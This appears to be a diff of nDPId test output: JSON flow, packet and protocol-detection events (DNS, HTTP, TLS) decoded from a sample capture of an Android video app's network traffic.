-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":945,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652846377} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":945,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9qQABABgLYwKi0ArL40NKmXgBQrzComDk0Q6ywEAgkkQkAAAEBCAoANZnyGkFqZAEBBQo5NE6EOTRT8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652846380} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9rQABABgLXwKi0ArL40NKmXgBQrzComDk0Q6ywEAgki50AAAEBCAoANZnyGkFqZAEBBQo5NE6EOTRZXA=="} -00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","packets-captured":946,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1895,"global_ts_msec":1449652846380} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652784341,"flow_last_seen":1449652784341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652784341,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":47699,"dst_port":5228,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1449652784341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652784341,"pkt":"RQAAPKbzQABABiV4wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIdPYAAAIEBbQEAggKADWBtgAAAAABAwMG"} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652786071,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1449652786071,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":63,"pkt_l4_len":43,"thread_ts_msec":1449652786071,"pkt":"RQAAP4JiQABAETORwKi0AggICAiWSAA1ACtxaqbPAQAAAQAAAAAAAAVvY3UwMwhsYWJnZW5jeQJ3cwAAAQAB"} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652786071,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocu03.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652786098,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1449652786098,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":70,"pkt_l4_len":50,"thread_ts_msec":1449652786098,"pkt":"RQAARoJmQABAETOGwKi0AggICAicoQA1ADK8OQlbAQAAAQAAAAAAAAhzZXR0aW5ncwtjcmFzaGx5dGljcwNjb20AAAEAAQ=="} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652786098,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"dns": {"query":"settings.crashlytics.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652786130,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1449652786130,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":67,"pkt_l4_len":47,"thread_ts_msec":1449652786130,"pkt":"RQAAQ4JpQABAETOGwKi0AggICAgFCwA1AC+TFZykAQAAAQAAAAAAAANhcGkEZXUwMQhjYXBwdGFpbgNjb20AAAEAAQ=="} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652786130,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"api.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786135,"flow_last_seen":1449652786135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786135,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1449652786135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786135,"pkt":"RQAAPJwfQABABqbCwKi0ArL40Da8egBQwI4edgAAAACgAjkI+LAAAAIEBbQEAggKADWCaQAAAAABAwMG"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786152,"flow_last_seen":1449652786152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786152,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1449652786152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786152,"pkt":"RQAAPCFLQABABqbpwKi0AhcV5seZXwG7KAKjIAAAAACgAjkIs5MAAAIEBbQEAggKADWCawAAAAABAwMG"} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786167,"flow_last_seen":1449652786167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786167,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1449652786167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786167,"pkt":"RQAAPOubQABABs8fwKi0AomHgc7QbABQfGRp9gAAAACgAjkIVT4AAAIEBbQEAggKADWCbQAAAAABAwMG"} +00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1449652786190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786190,"pkt":"RQAANJwgQABABqbJwKi0ArL40Da8egBQwI4ed\/tL3mKAEADlQqoAAAEBCAoANYJvRwX8Kg=="} 
+01476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1449652786215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":824,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":824,"pkt_l4_len":804,"thread_ts_msec":1449652786215,"pkt":"RQADOJwhQABABqPEwKi0ArL40Da8egBQwI4ed\/tL3mKAGADlWgkAAAEBCAoANYJxRwX8KlBPU1QgL2NhdGFsb2cvdm9kP3Y9MyBIVFRQLzEuMQ0KWC1MZ3ktSHNzLUE6IEZGRTg2OUEyLTMzQUQtQTU0QS1CRUMwLTcyMTBEMDNDODM1Qi0yNTk0RDYzRA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpYLUxneS1IU1MtU2VydmljZS1JZDogb2ZyLm9jcw0KWC1MZ3ktSFNTLVJvbS1JZDogc2Ftc3VuZy9HVC1QNzUxMC9BbmRyb2lkLzQuMC40L1hXTFA2L2FybXY3bF8xMDAwLjBNSHpfMTk5OC44NEJvZ29NaXBzX2ZlYXR1cmVzKHN3cCxoYWxmLHRodW1iLGZhc3RtdWx0LHZmcCxlZHNwLHZmcHYzLHZmcHYzZDE2LHRscylfY29yZXM9Mi8xMjgweDc1Mi9mYWxzZQ0KQ29udGVudC1MZW5ndGg6IDIzNA0KSG9zdDogb2N1MDMubGFiZ2VuY3kud3MNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjAuNDsgZnItZnI7IEdULVA3NTEwIEJ1aWxkL0lNTTc2RCkgQXBwbGVXZWJLaXQvNTM0LjMwIChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgU2FmYXJpLzUzNC4zMA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCI\/Pgo8bGd5cmVxdWVzdCBtb2R1bGU9IkNNL1ZPRCI+Cgk8YWN0aW9uIG5hbWU9ImluaXQiPgoJCTxwYXJhbSBuYW1lPSJzY3JlZW5TaXplIiB2YWx1ZT0iIi8+CgkJPHBhcmFtIG5hbWU9InRpbWVzdGFtcCIgdmFsdWU9IjAiLz4KCQk8cGFyYW0gbmFtZT0iYXBwLXZlcnNpb24iIHZhbHVlPSIxLjQuNyIvPgoJPC9hY3Rpb24+CjwvbGd5cmVxdWVzdD4="} 
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786135,"flow_last_seen":1449652786215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1449652786215,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; U; Android 4.0.4; fr-fr; GT-P7510 Build\/IMM76D) AppleWebKit\/534.30 (KHTML, like Gecko) Version\/4.0 Safari\/534.30"}} +00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1449652786268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786268,"pkt":"RQAANOucQABABs8mwKi0AomHgc7QbABQfGRp97oFwGaAEADlOEAAAAEBCAoANYJ3vXlL7A=="} 
+00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1449652786271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":211,"pkt_l4_len":191,"thread_ts_msec":1449652786271,"pkt":"RQAA0+udQABABs6GwKi0AomHgc7QbABQfGRp97oFwGaAGADl3TMAAAEBCAoANYJ3vXlL7EdFVCAveG1wcC1kaXNjbz9kZXZpY2VpZD1mMmM5OTNkNjIxOGY1ZTIyZmUyODRiMmU5MGM4MmYzYiZwdXNoX29uX2RldmljZT10cnVlJmFwcGlkPW9jczAwMDAwMyBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786167,"flow_last_seen":1449652786271,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1449652786271,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/xmpp-disco?deviceid=f2c993d6218f5e22fe284b2e90c82f3b&push_on_device=true&appid=ocs000003","code":0,"content_type":"","user_agent":""}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786395,"flow_last_seen":1449652786395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786395,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1449652786395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786395,"pkt":"RQAAPGAaQABABlqhwKi0AomHgc6vnwBQfAzimQAAAACgAjkI\/akAAAIEBbQEAggKADWCgwAAAAABAwMG"} +00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1449652786500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786500,"pkt":"RQAANGAbQABABlqowKi0AomHgc6vnwBQfAzimh3f\/xqAEADlPeYAAAEBCAoANYKOvXlMIw=="} 
+00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1449652786501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":136,"pkt_l4_len":116,"thread_ts_msec":1449652786501,"pkt":"RQAAiGAcQABABlpTwKi0AomHgc6vnwBQfAzimh3f\/xqAGADlKR0AAAEBCAoANYKOvXlMI0dFVCAvaXAtdG8tY291bnRyeSBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786395,"flow_last_seen":1449652786501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652786501,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/ip-to-country","code":0,"content_type":"","user_agent":""}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652786934,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1449652786934,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":72,"pkt_l4_len":52,"thread_ts_msec":1449652786934,"pkt":"RQAASIK5QABAETMxwKi0AggICAi+ggA1ADS3+1EXAQAAAQAAAAAAAAdhbmRyb2lkB2NsaWVudHMGZ29vZ2xlA2NvbQAAAQAB"} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652786934,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787003,"flow_last_seen":1449652787003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787003,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1449652787003,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787003,"pkt":"RQAAPLBhQABABm1GwKi0Atg60C6hBwG7mRQyoQAAAACgAjkIAHcAAAIEBbQEAggKADWCwAAAAAABAwMG"} +00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1449652787075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652787075,"pkt":"RQAANLBiQABABm1NwKi0Atg60C6hBwG7mRQyouLMvMiAEADlCc8AAAEBCAoANYLHGASl5Q=="} +00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1449652787100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":236,"pkt_l4_len":216,"thread_ts_msec":1449652787100,"pkt":"RQAA7LBjQABABmyUwKi0Atg60C6hBwG7mRQyouLMvMiAGADlzvUAAAEBCAoANYLKGASl5RYDAQCzAQAArwMBVmhd8vjfjZbbQQM2P+6kSvFiVrQbP+1p3IwwDXzkWPQAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} 
+00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787003,"flow_last_seen":1449652787100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652787100,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1449652787155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787155,"pkt":"RQAAPCFMQABABqbowKi0AhcV5seZXwG7KAKjIAAAAACgAjkIsy4AAAIEBbQEAggKADWC0AAAAAABAwMG"} +00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1449652787273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652787273,"pkt":"RQAANCFNQABABqbvwKi0AhcV5seZXwG7KAKjIVpZIEyAEADl\/h4AAAEBCAoANYLbl2cJ1g=="} 
